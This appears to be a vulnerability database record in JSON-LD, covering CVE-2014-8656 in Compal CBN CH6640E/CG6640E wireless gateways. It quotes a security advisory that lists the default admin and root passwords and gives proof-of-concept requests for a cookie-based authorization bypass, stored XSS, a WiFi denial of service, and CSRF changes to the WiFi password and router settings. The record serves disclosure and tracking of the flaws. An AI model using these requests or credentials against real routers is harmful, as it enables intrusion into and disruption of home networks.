GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
Cookie: userData Value: hax0r">alert(document.cookie);
--
document.cookie="hax0r">alert(document.cookie);; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Cross-Site Request Forgery (CSRF) Vulnerability
DDNS config:
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0179",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cg6640e wireless gateway",
"scope": "eq",
"trust": 1.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "",
"scope": "eq",
"trust": 1.6,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "ch664oe wireless gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "ch6640e wireless gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "networks",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "broadband networks inc cg6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks inc ch6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "model: ch6640 and ch6640e"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "hardware version: 1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "firmware version: ch6640-3.5.11.7-nosh"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "docsis mode: docsis 3.0"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:cg6640e_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:ch664oe_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:compal_broadband_networks:firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "BID",
"id": "70762"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 0.4
},
"cve": "CVE-2014-8656",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2014-8656",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-07893",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-76601",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-8656",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2014-8656",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-191",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.1,
"value": "(3/5)"
},
{
"author": "VULHUB",
"id": "VHN-76601",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH have a default password of (1) admin for the admin account and (2) compalbn for the root account, which makes it easier for remote attackers to obtain access to certain sensitive information via unspecified vectors. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Multiple information-disclosure vulnerabilities\n2. A denial-of-service vulnerability\n3. An HTML-injection vulnerability\n4. Other attacks are also possible. A remote attacker could exploit this vulnerability to gain access to sensitive information. \nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway. \n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information. \n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info. \n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1\u0026DdnsUserName=a\u0026DdnsPassword=b\u0026DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0\u0026sMode=7\u0026sbMode=1\u0026encAlgm=3\u0026psKey=NEW_PASSWORD\u0026rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static\u0026MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF\u0026LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=2 HTTP/1.1 (disable)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8656"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/cbn_mv.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-76601",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76601"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8656",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "35075",
"trust": 2.6
},
{
"db": "ZSL",
"id": "ZSL-2014-5203",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "128860",
"trust": 1.9
},
{
"db": "OSVDB",
"id": "113836",
"trust": 1.8
},
{
"db": "BID",
"id": "70762",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6
},
{
"db": "XF",
"id": "98328",
"trust": 0.1
},
{
"db": "XF",
"id": "98329",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113843",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113838",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113842",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113841",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113840",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113837",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113839",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2014100162",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-76601",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"id": "VAR-201411-0179",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
}
]
},
"last_update_date": "2025-04-13T23:14:41.428000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113836"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/35075"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html"
},
{
"trust": 0.9,
"url": "http://www.exploit-db.com/exploits/35075/"
},
{
"trust": 0.9,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8656"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2014100162"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113837"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113838"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113839"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113840"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113841"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113842"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113843"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/128860"
},
{
"trust": 0.1,
"url": "http://www.securityfocus.com/bid/70762"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98328"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98329"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basiclanusers.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/docsisconfigfile.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwbasicsetup.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setwirelesssecurity.html?ssid=0\u0026smode=7\u0026sbmode=1\u0026encalgm=3\u0026pskey=new_password\u0026rekeyint=0"
},
{
"trust": 0.1,
"url": "http://192.168.0.1:5000/rootdesc.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=1"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwwirelesssecurity.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/wirelesschannelstatus.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setbasicdhcp1.html?action=add_static\u0026macaddress=38%3a59%3af9%3ac3%3ae3%3aef\u0026leasedip=8"
},
{
"trust": 0.1,
"url": "http://www.icbn.com.tw"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html?ddnsservice=1\u0026ddnsusername=a\u0026ddnspassword=b\u0026ddnshostname=c#"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=2"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76601"
},
{
"db": "BID",
"id": "70762"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-25T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76601"
},
{
"date": "2014-10-28T00:00:00",
"db": "BID",
"id": "70762"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"date": "2014-10-28T00:59:24",
"db": "PACKETSTORM",
"id": "128860"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"date": "2014-11-06T15:55:10.913000",
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-07T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76601"
},
{
"date": "2014-12-03T00:56:00",
"db": "BID",
"id": "70762"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005243"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-191"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-8656"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Vulnerabilities in certain firmware that gain access to certain critical information",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005243"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-191"
}
],
"trust": 0.6
}
}
VAR-201411-0180
Vulnerability from variot - Updated: 2025-04-13 23:14The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to cause a denial of service (disconnect all wifi clients) via a request to wirelessChannelStatus.html. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Multiple information-disclosure vulnerabilities 2. A denial-of-service vulnerability 3. An HTML-injection vulnerability 4. Other attacks are also possible. Product web page: http://www.icbn.com.tw Affected version: Model: CH6640 and CH6640E Hardware version: 1.0 Firmware version: CH6640-3.5.11.7-NOSH Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages root/compalbn - Allow access gateway, provisioning pages and provide more configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2014-5203 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
Authorization Bypass Information Disclosure Vulnerability
http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
Cookie: userData Value: hax0r">alert(document.cookie);
--
document.cookie="hax0r">alert(document.cookie);; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Cross-Site Request Forgery (CSRF) Vulnerability
DDNS config:
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
